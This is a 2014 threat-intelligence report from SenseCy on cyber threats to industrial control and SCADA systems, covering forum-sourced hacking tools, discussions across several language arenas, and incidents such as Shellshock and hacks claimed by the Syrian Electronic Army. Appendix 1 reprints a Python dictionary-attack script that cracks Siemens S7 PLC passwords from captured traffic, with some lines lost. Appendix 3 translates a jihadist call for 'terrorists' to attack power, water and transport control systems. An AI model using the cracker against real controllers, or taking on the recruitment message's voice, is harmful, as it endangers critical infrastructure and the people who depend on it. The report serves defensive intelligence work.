Cyber Threats to SCADA Systems_Final

2014 SenseCy PO Box 8551, Poleg Netanya 4250711, Israel Tel +972-9-7482180 Israel [email protected] 1

Cyber Threats to ICS/SCADA Systems


Cyber Intelligence Report Cyber Threats to

ICS/SCADA Systems

Executive Summary

Recent years have witnessed an increased awareness within the worldwide security community of

risks related to cyber attacks against critical infrastructures. ICS/SCADA systems have been a

particular cause of concern for the security community, owing to Stuxnet, Flame and other cyber

threats. As automation continues to evolve and assumes a more important role worldwide, the use

of ICS/SCADA systems is likely to increase accordingly.

In late August 2014, for example, over 300 companies in the oil and energy sector received a

warning from the Norwegian authorities regarding a large-scale hacker attack. The attack was

described as a spear-phishing attempt aimed at key personnel in the targeted companies, with the

goal of injecting a Trojan or virus into company systems.1

Additionally, in recent months numerous cyber security firms have conducted research into the

relatively new variants of Havex malware used to execute attacks against ICS and SCADA systems. By

attaching the malware to certain software available for download from ICS/SCADA manufacturer

websites, the attackers succeeded in compromising SCADA-related systems.2 And, in late September

2014 a new large-scale vulnerability, ShellShock, captured global attention as one of the most

prominent vulnerabilities discovered recently.

This research includes a comprehensive review of the SCADA field and recent significant incidents,

SCADA vulnerabilities and exploits. This report is based on the data collected from a variety of

sources, including cyber blogs, closed forums, platforms for uploading stolen and leaked

information, as well as social networks. These web searches focused on the key cyber arenas and

were conducted in Chinese, Russian, Persian, Arabic and English. The report is divided into three

main chapters:

Analysis of malicious tools and hacking methods

Discussions and trends on closed and password-protected forums

Reviewing SCADA-Related Cyber Incidents

1 http://www.newsinenglish.no/2014/08/27/oil-industry-under-attack-by-hackers/

2 http://securityaffairs.co/wordpress/26092/cyber-crime/cyber-espionage-havex.html


Table of Contents

Analysis of Malicious Tools and Hacking Methods ......................................................................... 4

Brute-Force Tool for PLC Component Siemens S-7 .......................................................................... 4

ScadaScan Tool.................................................................................................................................... 5

PLCScan Tool ....................................................................................................................................... 6

SCADA Vulnerability Assessment Online Guide ............................................................................ 6

Discussions and Trends on Closed and Password-Protected Forums .............................................. 8

Iranian Sources .................................................................................................................................... 8

Chinese Sources .................................................................................................................................. 9

Russian Sources ................................................................................................................................. 10

Arabic Sources ................................................................................................................................... 11

English Sources ................................................................................................................................. 14

SCADA-Related Cyber Incidents .................................................................................................. 16

New Vulnerability Poses Possible Threat to ICS and SCADA Systems .............................................. 16

What this Means ........................................................................................................................... 17

The Syrian Electronic Army Hacks into Israeli SCADA Systems ......................................................... 18

The Syrian Electronic Army (SEA) .................................................................................................. 19

Iranian Hacker Group Implicates itself in Physical Attack on Electric Power Facility ....................... 22

Parastoo ........................................................................................................................................ 23

Jihadist Cyber Terror Group to Target SCADA Systems .................................................................... 24

Conclusion ................................................................................................................................. 26

Appendix 1 Brute-Force Tool Full Script .................................................................................... 27

Appendix 2 Technical Indicators for the SCADA-Related Tools .................................................. 29

Brute-Force Tool for S-7 .................................................................................................................... 29

ScadaScan ......................................................................................................................................... 29

PLCScan 29

Appendix 3: Full Translation of Yaman Mukhaddab's Message .................................................... 30


Analysis of Malicious Tools and Hacking

Methods

SenseCy operates numerous virtual entities over a range of web platforms, such as cyber blogs,

professional forums and closed hacking forums. This research includes searches for malicious tools

and hacking methods relevant to SCADA systems. Being a hot topic, the SCADA field is a major point

of interest for many hacker groups and individual hackers.

SenseCy has identified several SCADA-oriented hacking tools, on both Iranian and Chinese hacking

forums.

Brute-Force Tool for PLC Component Siemens S-7

The first is a brute-force tool aimed at widespread PLC components Siemens S-7. The tool was

found on an Iranian hacking forum and is capable of executing a dictionary based brute-force attack.

The tool analyzes captured network traffic, divides it into sub-divisions, locates specific elements and

then executes a brute-force attack on them.

SenseCy contacted Siemens representatives and informed them about this tool. We received the

following reply:

Designated room for SCADA hacking on a hacking forum


..As a general security measure, Siemens recommends that asset owners configure the environment according

to our operational guidelines3 in order to run the devices in a protected IT environment and to avoid

unauthorized network captures.

We respectfully suggest that you check to confirm that Siemens operational guidelines4 are being

followed correctly and thus safeguard yourself from this exploit.

For the full tool script, please see Appendix 1.

ScadaScan Tool

A second tool, ScadaScan, was found on the Chinese hacking forum. This tool was written by Amol

Sarwate from Qualys and is similar to the tool mentioned above. It too, has brute-force capabilities,

along with an option to scan and locate protocols widely used in SCADA systems. The tool essentially

scans to locate Modbus and DNP protocols (over TCP). The script can be implemented as part of a

larger suite.

3 http://www.industry.siemens.com/topics/global/en/industrial-

security/Documents/operational_guidelines_industrial_security_en.pdf 4 Ibid.

The hacking tool as presented on the forums (left); part of its script (right)

Screenshot of ScadaScan in action


PLCScan Tool

Another hacking tool found in the Chinese cyber arena is PLCScan. This is a scanning tool designed

to locate PLC devices based on IP range scan. It locates the IP and the relevant open ports on the

device. This tool supports S7 and Modbus protocols. For technical indicators based on our analysis

of the malicious tools, see Appendix 2.

SCADA Vulnerability Assessment Online Guide

One of our most interesting findings was an online guide titled: SCADA Vulnerability Assessment. This

guide, located on an Iranian hacking forum, is an extensive document (over 70 pages long) written in

Persian by two Iranian hackers and divided into four main chapters:

Introduction

Background of Critical Infrastructure Systems

The Different Parts in SCADA Systems

Industrial Control Systems (ICS)

Additional Background

Content Review

ICS and Critical Infrastructure

Protocol Layers Analysis

Modbus Protocol

Introduction to Fuzzing

Modbus Protocol Fuzzer

DNP3 Protocol

Security Assessment for ICS

Penetration Testing

Presenting the Devices used in our Experiments

Rapid Security Evaluation of ASATech RMU-2004 and DCM-2004

Cross Debugging and Cross Compiling

Reverse Engineering

Fuzzing Modbus TCP Protocol

Hardware Inspection

Additional Components and the Threat to Critical Systems

Example: Image of the Entire System

Security Assessment for Schneider Electric PLC

Example: Image of Firmware

Appendix 1: Proof of the Exploitability of ASATech Devices

Appendix 2: Modbus Fuzzer

Appendix 3: Virtual Portal of GSM Shield for Arduino


This guide reveals the tremendous interest in SCADA vulnerabilities and exploits, while displaying a

high level of understanding. This well-written document displays a significant degree of proficiency

on this particular subject. The structure and depth of the information, the level of details and the

description implies that a considerable amount of time was invested in it. This is without a doubt a

great guide and starting point for a beginner and even a specialist in the SCADA world.

The full document will be delivered to the client upon request.

Online guide cover

POC exploit code against ASATech Devices


Discussions and Trends on Closed and

Password-Protected Forums

It is common knowledge that in recent years, SCADA has become one of the most-discussed topics in

the cyber world. This chapter reviews the practice of SCADA-related topics in the arenas covered in

this report Iranian, Chinese, Russian, Arabic and English.

Iranian Sources

Iran is without doubt a hotspot for SCADA enterprises, both from an academic frame of reference, in

addition to more sinister motivating factors, such as hacking and vulnerability exploitation. As

mentioned, some hacker forums have designated rooms for SCADA hacking discussions, while some

individual hackers are more SCADA-oriented than others. One example of such a hacker is Pouriya

Naseri, who goes by the alias NOTER, and is affiliated with the Iranian DataCoders hacker group. One

document written by Naseri is titled Electo Hack and it comprises three sections:

Basic Information about Electronic & Electrical Controllers

Example for an Attack (Electro Hack)

Basic Information about Vulnerability of PLC & SCADA

The full document written by Naseri will be delivered to the client upon request.

Introductory explanation about SCADA protocols

Introductory explanation regarding a SCADA exploit


Chinese Sources

Unlike hacker forums in other arenas, no dedicated rooms for SCADA were found on Chinese hacker

forums. Discussions about SCADA-related issues are usually held in rooms with general designations,

such as "Software Security". Most SCADA-related content is either translated to Chinese from

English sources or directly quoted from the official sites of the manufacturers (for example warnings

against newly uncovered vulnerabilities).

There are several professional Chinese sites dedicated solely to SCADA. These sites typically feature

discussion rooms, news reports, downloading areas, and articles and products for sale. In the

discussion section, separate rooms are established for various SCADA components and different

manufacturers such as Siemens, AB and Schneider. The information exchanged on these platforms is

mostly professional or educational, and the forum members occasionally share vulnerabilities as

published by the official manufacturers or by the US-CERT.

An article about the Havex virus translated from English

Example of different discussion rooms


Even though we did not find a Chinese hacking blog dedicated entirely to SCADA, some blogs do

publish SCADA-related articles and tools. Two of these tools were described above in the Malicious

Tools and Hacking Methods chapter:

ScadaScan

PLCScan

Russian Sources

While monitoring Russian sources, SenseCy identified mostly open source reports dealing with

SCADA vulnerabilities5 and analyses of major incidents in the SCADA field from the last few years,

such as the Havex malware and Stuxnet.

One example of such a report was published in June 2014 by the Russian security company USSC

(Ural Center for System Security). This report reviewed the Havex Trojan for SCADA systems, relying

mostly on English sources.6

In addition, we identified several closed forums dedicated to SCADA discussions addressing mostly

technical topics, rather than harmful activity. The members of these forums are professionals who

work in the industry and often discuss different aspects of ICS systems.7

5 http://internetua.com/kriticseskie-uyazvimosti-v-SCADA-pozvolyauat-hakeram-polucsit-kontrol-nad-

promishlennimi-sistemami 6 http://www.ussc.ru/articles/id/19

7 www.Asutpforum[.]ru/viewtopic.php?f=104&t=4302&start=75

Screenshot from the Russian report about the Havex Trojan


It is important to note that the Russian underground is primarily devoted to financial scams that can

turn easy profits. Russian underground players appear less concerned with attacking SCADA systems

and are more interested in making a profit. While we cannot underestimate the capabilities of

Russian hackers in impairing SCADA systems, such plans would most likely not be discussed on

accessible web platforms.

Arabic Sources

Since 2013, Arab hackers have become more and more involved in the global petroleum Industry. In

June 2013, the infamous hacker group AnonGhost launched a hacktivist operation titled #OpPetrol, a

cyber-campaign targeting the petroleum industry around the world. The group's official target list

includes companies such as the Saudi Arabian Aramco, British Petroleum in the U.K. and Texaco in

the U.S.

The #OpPetrol operation is responsible for defacements of the websites of petroleum companies

and the leakage of valuable data such as usernames, passwords and personal details.

A discussion from a professional SCADA forum about protecting a work

station with ICS systems installed on it

An announcement on the official AnonGhost Twitter account


However, security experts are often more concerned about advanced hackers who could

compromise SCADA systems or ICS in the petroleum industry.8

Discussions pertaining to SCADA-related topics from Arabic sources focus on the importance of

SCADA systems and the significant damage that could result if these systems were to be

compromised in an operation like #OpPetrol.

SCADA systems are mentioned on white hat platforms as well. One such platform is a Facebook page

titled "Teaching Hack for Arabs" that promises to teach people how to hack SCADA systems and

other control systems in order to become security experts.9

Another example of SCADA hacking practices is a tweet posted on December 3, 2013 by Abdulla el-

Aly, a Kuwaiti information security (IS) expert and CEO of Cyberkov Ltd. This tweet comments on

hacking SCADA as part of a course at a black hat conference. El-Aly uploaded a picture of the various

tools that he uses to hack the system.10

8 https://blog.cyberkov.com/?s=%D8%B3%D9%83%D8%A7%D8%AF%D8%A7

9 https://www.facebook.com/pages/Teaching-Hack-For-of-

Arabs/323714387692923?sk=app_106171216118819 10

https://twitter.com/3bdullla/status/275698599789211648; https://twitter.com/3bdullla

A post from a Facebook page about teaching SCADA hacking


Another forum discussion thread about SCADA was started on September 25, 2013 on the Arabic

forum, Dev-Point, a platform dedicated mostly to developers discussions. Hacker al-Basra al-Iraqi

inquired about ways to hack SCADA systems. Another hacker called SkAnDeR X replied that he had

never heard of any hacker who had succeeded in breaching SCADA systems but he hoped that

someone would do so in the future. A third hacker named al-Safah provided detailed technical

information about SCADA systems and claimed that a simple computer with BackTrack Linux

distribution created for penetration testing was insufficient for hacking a SCADA system. A hacker

named Black Ghost claimed that there were many ways to hack SCADA systems, by exploiting its

vulnerabilities for instance. He also mentioned that in 2011, a vulnerability was identified in

KingView SCADA software and exploited via Metasploit. Moreover, he claimed that SCADA systems

could be hacked by radio waves, a method requiring close proximity to the system. Another hacker

with the alias Muslim Aqeel provided a link to VUPEN Security Researchs11 "7T Interactive Graphical

SCADA Systems (IGSS) Remote Memory Corruption" from May 24, 2011.12

Another source for SCADA-related topics is military forums. In January 2014, a review about PLC with

an emphasis on traffic systems13 was posted on the Arabic-Military forum.

11 www.seclists.org/bugtraq/2011/May/168; www.vupen.com/english/research.php

12 www.dev-point[.]com/vb/t431641.html

13 http://www.arabic-military[.]com/t90369-topic

Tweet by a Kuwaiti IS expert on

SCADA hacking


In conclusion, the information accumulated from Arabic sources is mostly general, with references

to SCADA vulnerabilities, but with no actual tools or detailed methods for hacking SCADA systems or

endangering critical infrastructure systems.

English Sources

Throughout our research, we noticed a large variety of discussions on the topic of SCADA. Most

discussions revolved around theoretical attacks of critical infrastructures,14 where users discussed

the implications and complexities of attacking large organizations and strictly supervised

infrastructures. Few forum threads showcased security holes discovered by forum members in

critical infrastructure software and hardware. However, most of the showcased vulnerabilities were

published by major security firms.

Critical infrastructures companies were mentioned on a platform commonly used by hackers for

leaking sensitive information and target lists.15

On another Pastebin upload from 2013, organizers called on participants to use DDoS tools to attack

governmental and major corporate websites.16 Several malware developers even offered their

customized DDoS tools, designed specifically to take down carefully monitored and powerful servers.

14 http://www.garage4hackers[.]com/showthread.php?t=2431

15 http://pastebin.com/bHvn7rwe

16 http://pastebin.com/Bqak4Mjm

Screenshot of a PLC review on the Arabic-Military forum

A list of IPs posted on Pastebin


In addition to the Pastebin upload, SenseCy identified a post on a closed forum reviewing an exploit

found at a U.S. water power plant. This exploit is being offered online by the hacker who created it.

He showcased screenshots of the system interface, as well as his mail discourse with the Industrial

Control Systems Cyber Emergency Response Team (ICS-CERT) in the course of which CERT expressed

great interest in the exploits capabilities.17

One vulnerability disclosed in another discussion on this closed forum was an unauthorized access

vulnerability that affects many SCADA systems and remote Netgear. The vulnerability is used to

brute-force on HTTP login panels and its exploitation is explained in a step by step guide.18

17 http://www.alboraaq[.]com/forum/showthread.php?t=269076

18 http://www.alboraaq[.]com/forum/showthread.php?t=381388

Screenshots of the SCADA control panels taken by the hacker as proof

The hackers proof of concept for his exploitation of the vulnerability


SCADA-Related Cyber Incidents

New Vulnerability Poses Possible Threat to ICS and SCADA

Systems

In late September 2014, ShellShock, a new large-scale vulnerability captured global attention as one

of the most prominent vulnerabilities discovered recently.19

Shellshock or Bashdoor, after the Unix Bash shell it takes advantage of, is especially relevant for

Unix-based OS, such as Linux and Apples OS X. Apple, for its part, addressed the news about this

vulnerability and clarified that the vast majority of OS X users are safe and that Apple will soon

release a security update for users who configure advanced UNIX services and might be vulnerable

to this security flaw.20

One of the major issues with this vulnerability, described by some as Bigger than Heartbleed,21 is

its possible effect on SCADA systems and ICS (Industrial Control System). 22 According to different

publications, well-needed security updates may not even be available for such systems running

unsupported versions of Linux. In addition, many ICSs outlive the manufacturers recommended

lifespan.23 Moreover, multiple firms and corporations have warned their customers of the possible

threat this new vulnerability poses, listing unpatched and vulnerable products.24

Other than various news items about Shellshock, SenseCy identified several references to this newly

discovered vulnerability on different hacking forums. One example is an Iranian hacking forum

where members posted detailed explanations on this vulnerability.

19

http://www.slate.com/articles/technology/technology/2014/09/shellshock_what_you_need_to_know_about_the_bash_vulnerability.html 20

http://www.macworld.com/article/2687826/apple-says-most-mac-users-are-safe-from-shellshock-bash-bug-promises-quick-fix.html; http://krebsonsecurity.com/2014/09/apple-releases-patches-for-shellshock-bug/ 21

http://www.pcworld.com/article/2687857/bigger-than-heartbleed-shellshock-flaw-leaves-os-x-linux-more-open-to-attack.html 22

http://www.v3.co.uk/v3-uk/analysis/2372312/bash-shellshock-bug-puts-servers-scada-and-web-world-at-risk 23

http://news.softpedia.com/news/Industrial-Control-Systems-Equipment-Difficult-to-Patch-Against-Shellshock-Bug-460061.shtml 24

http://articles.economictimes.indiatimes.com/2014-09-27/news/54377111_1_solaris-bug-products; http://news.softpedia.com/news/New-Remote-Code-Execution-Flaws-Found-In-Shellshock-Patched-Bash-460348.shtml


What this Means

The vast majority of critical system management runs on some version of UNIX or Linux. In most

cases, it is a specially designed version and the organizations do not know how to patch it (if it is

even available), and in worst-case scenarios, the vendor does not provide any updates or patches for

the systems, specifically because of its uniqueness. This particular vulnerability is so fundamental

that it can provide access to critical assets with minimum effort. This powerful exploit can enable an

attacker to execute arbitrary commands on the system.

Even more worrisome is the fact that immediately following the release of Shellshock, more

implementations and variants of this vulnerability (Bash-related) were found. There are already

indications of various bots using this vulnerability. And if we take into consideration that the bug

dates back to the initial versions of bash, we can only speculate where it will end, if at all.

Forum post detailing related scripts


The Syrian Electronic Army Hacks into Israeli SCADA Systems

On May 6, 2013 the cryptome.org website reported a successful attack by the "Syrian Electronic

Army" (SEA) on a strategic Israel infrastructure system in Haifa. In an email sent to the website, the

attack was declared to be a warning to decision-makers in Israel, evoking alleged Israeli Air Force

(IAF) attacks on Syrian territory at the beginning of May 2013. The claim of responsibility for the

attack was accompanied by a .pdf file with screenshots substantiating the cyber attack.25

Examination of the screenshots proved that the attack was authentic, but was not aimed at a Critical

National Infrastructure (CNI) like the municipal water SCADA system in Haifa. Our research did,

however, reveal that the attackers had targeted the irrigation control system of Kibbutz Sa'ar, near

Nahariya. Control of this system would present the hacker with numerous capabilities, among which

is the destruction of the agricultural yield.

We also noticed that the time shown on the screenshot indicated the end of April 2012. It is possible

that the system clock was incorrectly set, but it is more likely that the system was breached a year

ago and the published Retaliatory Strike was retained as a contingency plan for exactly such an

attack by Israel.

The Syrian Electronic Army posted a denial via its Twitter account, where it stated that it was not

behind the attack.26 On other occasions, this Twitter account has been used as a platform for claims

of responsibility, but with this incident, the above attack is not mentioned, neither here nor on the

groups official website or forums (apart from the denial). It should be noted that there are

numerous examples of fictitious claims of responsibility intended to deflect identification of the

attacker MO (Modus Operandi) of state-sponsored hacker groups.

25 http://cryptome.org/2013/05/sea-haifa-hack.htm, http://pastebin.com/aRCHLeRr

26 https://twitter.com/Official_SEA12/status/332172497397088256

Screenshot from the PDF released by the attackers


This incidence is another link in a chain of events demonstrating an impressive ability to locate and

exploit SCADA systems that appear to be susceptible to the Muslim hackers skills. However, in our

view, this event is unprecedented. For the first time in public, a critical computerized infrastructure

facility on Israeli soil has been attacked, and it is extremely likely that a sovereign state is behind the

attack, declaring outright war in the cyber arena and deviating from the intelligence-gathering

plateau.

The Syrian Electronic Army (SEA)

The Syrian Electronic Army (SEA), a group of hackers working in support of Syrian President Bashar

al-Assad, first emerged in mid-2011 during the first Syrian uprisings, when it started attacking a wide

array of media outlets. Its campaign includes DDoS attacks, phishing, pro-Assad defacements and

spamming against governments, online services, and media organizations that are perceived hostile

to the Syrian government.27 The SEA's primary goal is to improve the Syrian government's image and

target its opponents and critics.

Notable Activities

To date, the SEA has successfully targeted Associated Press (AP), CNN, BBC, Daily Telegraph,

Financial Times, Guardian, The Washington Post, The New York Times, and more. Its most famous

operation was an announcement via AP's Twitter account according which the White House was

bombed and President Obama injured. The tweet caused the stock market to briefly dip more than

$100 billion dollars.28

27 http://www.fireeye.com/blog/technical/cyber-exploits/2013/07/syrian-electronic-army-hacks-major-communications-

websites.html 28

http://www.vice.com/read/the-syrian-electronic-army-almost-crashed-the-dow-jones

SEA denial on their Twitter account


In May 2013, the cryptome.org website reported a successful attack by the SEA on a strategic Israel

infrastructure system in Haifa. Examination of the screenshots proved that the attack was authentic,

but was not aimed at a Critical National Infrastructure (CNI) like the municipal water SCADA system

in Haifa. Our research did, however, reveal that the attackers had targeted the irrigation control

system of a Kibbutz 30km north of Haifa. Nevertheless, it proves their growing capability and may

indicate a cooperation of the group with other state actors in the region.

Methods of Operation

The SEA is very active on social media networks, including Twitter, Facebook, Google+, YouTube,

Instagram, Pinterest, and smartphone apps. The group also runs an official website, SEA.sy, where it

appeals for volunteers to promote and aid its cause using social media.29 The group often sends

socially-engineered spear-phishing emails to lure the victim into opening weaponized and malicious

documents.30

29 http://www.memri.org/report/en/0/0/0/0/0/0/7357.htm

30 http://www.theregister.co.uk/2013/08/01/sea_analysis/

The drop in the DOW Jones after the SEA's Obama tweet


Summary

The SEA's exact relationship to the Syrian regime remains unclear. We believe however that the

group is not just working in support for the Syrian government, but rather operating under its orders

and guidance. In any case, recent months have proven that the SEA has emerged as a much more

serious threat not only to media outlets but also to government agencies, corporations and perhaps

even critical infrastructure systems around the world.

Having said that, it is important to emphasize that currently the group does not have the capabilities

to cause the damage that nation-state actors like China, Russia and even Iran hold.

In a scenario involving an American strike on Syria, we expect that the SEA will retaliate and wage

perhaps with the help of state-sponsored Iranian hacker groups cyber attacks against U.S. and

Western targets, such as media organizations, financial institutions, government entities and critical

infrastructure systems.

SEA's Twitter account (left); "Volunteering in the SEA" (right)


Iranian Hacker Group Implicates itself in Physical Attack on

Electric Power Facility

On January 2, 2014, the Cryptome.org website (a digital library host) published a message from the

Iranian hacker group "Parastoo", directed at the American authorities. The message headline

connects the group to a "military-style" attack on an electric power station, the PG&E Metcalf

substation, in California, U.S.A. on April 16, 2013. The connection to the Iranian group is unclear,

despite the fact that Parastoo has mentioned that it has been testing national critical infrastructures

using cyber vectors.31

On April 16, 2013, an undetermined number of individuals breached the PG&E Metcalf power

substation in California and cut the fiber-optic cables in the area around the station. The act

neutralized some local 911 services and temporarily disrupted cell phone service in the area. The

perpetrators also fired shots from high-powered rifles at several transformers in the facility. Ten

were damaged and several others shut down.

Despite the fact that the attack is being treated as vandalism, the FBI has taken over the case. There

appears to have been some initial concern, or at least interest, in the fact that the shooting occurred

one day after the Boston Marathon attacks. But according to the FBI, there is no evidence at this

time relating the attack to terrorism.32

31 http://cryptome.org/2014/01/parastoo-pge-metcalf.htm

32 http://complex.foreignpolicy.com/posts/2013/12/24/power-station-military-

assault#sthash.EpAunaEs.8OPXCTqS.dpbs, http://www.dailymail.co.uk/news/article-2530879/FBI-investigates-military-style-attack-California-power-station.html

Cryptome message


It should be noted that there have been several attacks against different infrastructure facilities in

the U.S. in the past year, such as the Arkansas power grid. Furthermore, officials conceded that the

electric power industry is focusing on the threat of cyber attacks.33

Parastoo

The Iranian hacker group Parastoo34 first emerged on November 25, 2012, when they posted a

message announcing they hacked into the International Atomic Energy Agency (IAEA) and leaked

personal details of its officials.35

In February 2013, Parastoo claimed to have stolen nuclear information, credit card information, and

the personal identities of thousands of customers, including individuals associated with the U.S.

military, that work with IHS Inc., a global information and analytics provider.36

In March 2013, several weeks prior to an April 7 anti-Israeli cyber operation, Parastoo announced

that they would demonstrate "a new generation of APT on political, social, financial cyber entities"

during the upcoming #OpIsrael campaign.37 The campaign itself included mostly DDoS, defacement

and SQLi attacks on official and private Israeli websites. We have found no evidence of using APT

tools during this cyber operation.

33 http://complex.foreignpolicy.com/posts/2013/12/24/power-station-military-

assault#sthash.EpAunaEs.8OPXCTqS.dpbs, http://www.dailymail.co.uk/news/article-2530879/FBI-investigates-military-style-attack-California-power-station.html, http://www.nytimes.com/2013/10/09/us/power-grid-is-attacked-in-arkansas.html?_r=0 34

Parastoo means swallow (the bird) in Persian. 35

http://cryptome.org/2012/11/parastoo-hacks-iaea.htm, http://pastebin.com/SdYaPUwr 36

http://cryptome.org/2013/02/parastoo-janes-cbrn.htm, http://freebeacon.com/anti-israel-hacking-collective-strikes-again/, http://wikileak.ir/en/leaks/13 37

http://cryptome.org/2013/03/parastoo-mt-apt.htm

Operation Roohollah Parastoo claims to have hacked into IHS Inc.


On July 3, 2013, Parastoo claimed to have launched a UAV flight on U.S. soil.38 Several days later,

they published a short, mysterious video featuring allegedly documenting a UAV watching a U.S.

aircraft carrier.39

We do not have any information regarding the members of the group, but we believe this to be an

anti-American and anti-Israeli hacker group, likely supported by the Iranian regime like other Iranian

groups.

Jihadist Cyber Terror Group to Target SCADA Systems

On June 11, a prominent Web Jihadist from the Shumukh al-Islam forum, Yaman Mukhaddab,

launched a campaign to recruit male and female volunteers for a new Electronic Jihad group. The

campaign, which takes place over the thread itself, begins with a clear definition of the groups tasks

and priorities. Mukhaddab says:40

Simply put, it is a cyber-terror base, for launching electronic terror attacks on major infidel

powers, specifically the U.S., the U.K. and France, no others. This base is not going to attack,

for instance, the sites of Shia, Christians, apostates, slanderers, liar sites and forums or

anything else. I repeat: it will only target the U.S., the U.K. and France.

Mukhaddab goes on to list the main targets for future attacks. SCADA systems are ranked as a top

priority target, in order to destroy power, water and gas supply lines, airports, railway stations,

underground train stations, as well as central command and control systems in these three

38 http://cryptome.org/2013/07/parastoo-uav-launch2.htm

39 http://www.hongpong.com/archives/2013/07/07/mysterious-parastoo-apparent-iranian-hacker-group-

claims-uav-flight-inside-usa-r, http://www.youtube.com/watch?v=lmuScdQPMFc&feature=player_embedded 40

See Appendix 3 for a full translation of Mukhaddabs message.


countries. The second priority includes control systems of general financial sites, such as central

savings organizations, stock markets and major banks. Third on the groups agenda are websites and

databases of major corporations dominating the economies of these countries, while fourth and last

are less specified public sites affecting the daily routine of citizens, in order to maximize the terror

effects on the population.

Mukhaddab details the desired skills of anyone wishing to join the group, including: thorough

understanding of SCADA systems, preferably with experience in hacking them; acquaintance with

writing hacking programs and scripts, and programming in C, C+ and C++ languages; expertise in

networks, communication protocols and various kinds of routers and firewalls, specifically

mentioning CISCO; Expertise in Linux or Unix operating systems; expertise in Windows operating

system; capability of detecting security vulnerabilities; acquaintance with hacker websites, capability

of entering them easily, searching for required scripts, tools, or software, and providing them to

fellow members, if asked to; complete mastery of English or French scientific language, and scientific

background in computer engineering; mastery of the Russian language; and mastery of the Chinese

language. Members who want to volunteer are asked to post a response in the thread, specifying

the categories that fit their capabilities.

To date, close to a hundred volunteers have already signed on to Mukhaddabs Electronic Jihad

group. We have yet to see indications that this newly formed group has started to engage in online

hacking activity, but given the enthusiasm it created among forum members, this is likely to occur in

the near future.


Conclusion

The purpose of this report is to provide a thorough review of the SCADA field in major cyber arenas.

This report included information regarding malicious tools and methods for hacking SCADA systems

and a review of major cyber arenas and the practice of SCADA-related topics.

The report included and analysis of hacking tools for SCADA systems found on Chinese and Iranian

closed forums. It is clear that the SCADA field as whole, as well as relevant vulnerabilities and

exploits, are of great interest to Chinese and Iranian hackers. The report also covered discussions on

closed hacking forums and the review of significant SCADA-related cyber incidents.

Generally speaking, we can attest that the world of SCADA hacking is becoming more and more

accessible to hackers from around the world, from Hacktivists to Cyber Criminals. In our mind, both

the vendors and the users should take into account that in the next two years, the amount of

probing and research done on SCADA systems is going to be as prolific as vulnerability research on

desktops and mobile systems.


Appendix 1 Brute-Force Tool Full Script

"""

File: s7-brute-offline.py

Desc: offline password bruteforsing based on challenge-response data,

extracted from auth traffic dump file

import sys

import hashlib

import hmac

from binascii import hexlify

try:

from scapy.all import *

except ImportError:

print "please install scapy: http://www.secdev.org/projects/scapy/ "

sys.exit()

cfg_pcap_file = '/root/siemens/RE_S7/stop_cpu_cmd_right_pass_123.pcap'

cfg_dictionary_file = 'dict.txt'

def get_challenge_response():

r = rdpcap(cfg_pcap_file)

lens = map(lambda x: x.len, r)

pckt_lens = dict([(i, lens[i]) for i in range(0,len(lens))])

# try to find challenge packet

pckt_108 = 0 #challenge packet (from server)

for (pckt_indx, pckt_len) in pckt_lens.items():

if pckt_len+14 == 108 and hexlify(r[pckt_indx].load)[14:24] ==

'7202002732':

pckt_108 = pckt_indx

break

# try to find response packet

pckt_141 = 0 #response packet (from client)

_t1 = dict([ (i, lens[i]) for i in pckt_lens.keys()[pckt_108:] ])

for pckt_indx in sorted(_t1.keys()):

pckt_len = _t1[pckt_indx]


'7202004831':

pckt_141 = pckt_indx

break

# try to find auth result packet

pckt_84 = 0 # auth answer from plc: pckt_len==84 -> auth ok

pckt_92 = 0 # auth answer from plc: pckt_len==92 -> auth bad

for pckt_indx in sorted(_t1.keys()):

pckt_len = _t1[pckt_indx]


'7202000f32':

pckt_84 = pckt_indx

break



'7202001732':

pckt_92 = pckt_indx

break

print "found packets indeces: pckt_108=%d, pckt_141=%d, pckt_84=%d,

pckt_92=%d" % (pckt_108, pckt_141, pckt_84, pckt_92)

if pckt_84:

print "auth ok"

else:

print "auth bad. for brute we need right auth result. exit"

sys.exit()

challenge = None

response = None

raw_challenge = hexlify(r[pckt_108].load)

if raw_challenge[46:52] == '100214' and raw_challenge[92:94] == '00':

challenge = raw_challenge[52:92]

print "found challenge: %s" % challenge

else:

print "cannot find challenge. exit"

sys.exit()

raw_response = hexlify(r[pckt_141].load)

if raw_response[64:70] == '100214' and raw_response[110:112] == '00':

response = raw_response[70:110]

print "found response: %s" % response

else:

print "cannot find response. exit"

sys.exit()

return challenge, response

def calculate_s7response(password, challenge):

challenge = challenge.decode("hex")

return hmac.new( hashlib.sha1(password).digest(), challenge,

hashlib.sha1).hexdigest()

if __name__ == '__main__':

print "using pcap file: %s" % cfg_pcap_file

challenge, response = get_challenge_response()

print "start password bruteforsing ..."

for p in open(cfg_dictionary_file):

p = p.strip()

if response == calculate_s7response(p, challenge):

print "found password: %s" % p

sys.exit()

print "password not found. try another dictionary."


Appendix 2 Technical Indicators for the

SCADA-Related Tools

Brute-Force Tool for S-7

Tool Type: Brute-force

Tool Size: 3.3 KB

MD5: ea2ce25bed88468509f75801a03ad4a7

ScadaScan

Tool Type: Scanner, brute-force

Tool Size: 3,908 bytes

MD5: ac0ebc8b18b98639a1b1d8531db17cb2

PLCScan

Tool Type: Scanning tool

Tool Size: 3,093 bytes

MD5: be7d53a8992ba11aa715b2c9b664054f


Appendix 3: Full Translation of Yaman

Mukhaddab's Message

Honestly speaking: we need male and female terrorists to start a new al-Qaeda base. This is

serious, so we wish for everyone to view it

In the Name of Allah, the Most Compassionate and Merciful

[]

Without any unnecessary introductions: it is not a joke! We need male and female terrorists, in

order to start a new al-Qaeda base which can only be started after we make sure we have the

necessary number of personnel.

Later on we will present the tasks and objectives of this base, followed by the general requirements

of the terrorists, followed by the categories of expertise required of the terrorists needed.

Whoever reads this thread and wants to volunteer must meet just two requirements:

Absolutely consent to the general requirements.

Choose the field fitting ones capabilities, without the slightest exaggeration. In case of any

doubt, it is better if one underestimate ones capabilities, since an overestimation may be

disastrous, resulting in the failure of great operations and a fellow members efforts.

Whoever cannot meet the general requirements, or finds no field fitting his capabilities, I kindly ask

him to only pray for his fellows, taking no part in this project, no matter how enthusiastic he may be

about it. He may have many other ways to support jihad and jihadists. This is to make this thread

focused and easy to check, and to allow the advance to the next stage, by Allahs will.

I ask whoever reads the thread not to be amazed at or complain about the public manner in which

we decided to make this address, and not advise us to keep it secret. If secrecy was of any use, we

would not have resorted to publicity. We need, first of all, to make sure we have the necessary

number of male and female volunteer terrorists meeting the requirements, and this can only be

done publicly.

Likewise, to anyone arguing that some of these volunteers may be enemy agents, I say: certainly,

